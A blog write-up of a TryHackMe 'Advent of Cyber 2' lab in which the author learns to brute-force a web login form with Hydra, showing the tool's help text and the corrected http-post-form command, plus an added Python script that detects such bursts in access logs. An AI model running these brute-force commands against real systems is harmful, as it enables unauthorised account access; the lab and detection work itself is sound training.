TryHackMe — Advent of Cyber 2 — Day 3

Trent Darrow
Dec 5, 2020

Good morning all,

Going to try and catch up today on the last few days of this event. Work here has been busy and the internet spotty. Let’s take advantage of when it is working.

Day 3 looks like it will be simple enough with the use of bad/easy credentials. They are suggesting to use Burp for this and even have the write-up on how to do it. Instead I want to struggle bus my way through learning Hydra again.

Anyhow, let’s get to it,

So reading through the guide on the room, I made two text documents: usernames and passwords with their suggestions.

When we navigate to the machine in Firefox, we get this page.

Now, since it essentially (I’m thinking) gives us the answer combination (3 usernames and 3 passwords) we could just guess. But again, I’m here to learn.

So let’s figure out the Hydra syntax.

#hydra -h
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]

Options:
-R restore a previous aborted/crashed session
-I ignore an existing restore file (don't wait 10 seconds)
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-y disable use of symbols in bruteforce, see above
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-o FILE write found login/password pairs to FILE instead of stdout
-b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel per target (default: 16)
-T TASKS run TASKS connects in parallel overall (for -M, default: 64)
-w / -W TIME wait time for a response (32) / between connects per thread (0)
-c TIME wait time per login attempt over all threads (enforces -t 1)
-4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-O use old SSL v2 and v3
-q do not print messages about connection errors
-U service module usage details
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at https://github.com/vanhauser-thc/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: afp ncp oracle sapr3.
Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
% export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries)
% export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
% export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)
Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh

And.. this is why you read up on the tool before just wingin’ it..

Found a tutorial online (https://redteamtutorials.com/2018/10/25/hydra-brute-force-https/), I’m just going to follow along with it and paste my experience here.

So let’s begin with their tutorial and see if it gets us there. Open the Network tab and toss in a bogus login so we can get the failure error message.

hydra -L <USER> -P <Password> <IP Address> http-post-form "<Login Page>:<Request Body>:<Error Message>"

So let’s build to what we need:

hydra -L usernames.txt -P passwords.txt 10.10.226.104 http-post-form "/:username=^USER^&password=^PASS^&Login=Login:username_incorrect"

OK.. either I messed up the command or they are tricking me with a different username:password.

Well, I kind of cheated for the sake of my own learning. It is one of the username:password combinations. I just manually tested some combinations. Let’s go back and fix our command and see what we did wrong.

Decided to do a packet capture since I was hitting a wall just to take a look at the responses.

We are getting a 404 on every try.. Cannot POST /

OK, looking back at the form on the original login page, the submit button forwards to /login. Let’s fix the Hydra command again..

hydra -L usernames.txt -P passwords.txt 10.10.226.104 http-post-form "/login:username=^USER^&password=^PASS^&Login=Login:username_incorrect"

And… we have success

Well that was a trainwreck but we got in.
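
Seen from the server side, the two Hydra runs above leave a recognisable trail: a burst of POSTs to / answered with 404, then a burst of POSTs to /login. The following log check is an added example, not part of the original write-up or the room; the access-log format, the client addresses, the 302 status on login responses and the threshold and window values are all assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')

def sample_log():
    """Constructed access log (not from the room): one noisy client, one ordinary user."""
    fmt = '{ip} - - [05/Dec/2020:10:{m:02d}:{s:02d} +0000] "POST {path} HTTP/1.1" {st} 139'
    lines = [fmt.format(ip="10.9.0.5", m=0, s=i, path="/", st=404) for i in range(9)]
    lines += [fmt.format(ip="10.9.0.5", m=2, s=i, path="/login", st=302) for i in range(9)]
    lines += [fmt.format(ip="10.9.0.77", m=m, s=0, path="/login", st=302) for m in (1, 9)]
    lines.append("garbage line that does not parse")
    return "\n".join(lines)

def parse(log_text):
    """Yield (ip, timestamp, method, path, status) for each well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of crashing
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        yield m["ip"], ts, m["method"], m["path"], int(m["status"])

def detect_bruteforce(log_text, login_path="/login", threshold=5, window=timedelta(seconds=60)):
    """Return {ip: [reasons]} for clients with >= threshold matching POSTs inside window."""
    posts = defaultdict(list)   # ip -> timestamps of POSTs to the login path
    misses = defaultdict(list)  # ip -> timestamps of POSTs answered with 404
    for ip, ts, method, path, status in parse(log_text):
        if method != "POST":
            continue
        if status == 404:
            misses[ip].append(ts)
        elif path.split("?")[0] == login_path:
            posts[ip].append(ts)
    alerts = {}
    for label, table in (("login POST burst", posts), ("POST 404 burst", misses)):
        for ip, stamps in table.items():
            stamps.sort()
            start = 0
            for end in range(len(stamps)):
                while stamps[end] - stamps[start] > window:
                    start += 1  # slide the window forward
                if end - start + 1 >= threshold:
                    alerts.setdefault(ip, []).append(label)
                    break
    return alerts
```

The check counts attempts per source rather than relying on a failure status, since the page does not show what the application returns for a bad login.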

Below where I cropped the screenshot is the flag; as usual, you can do a little work as well. Best of luck.

Until next time,

-3lduderino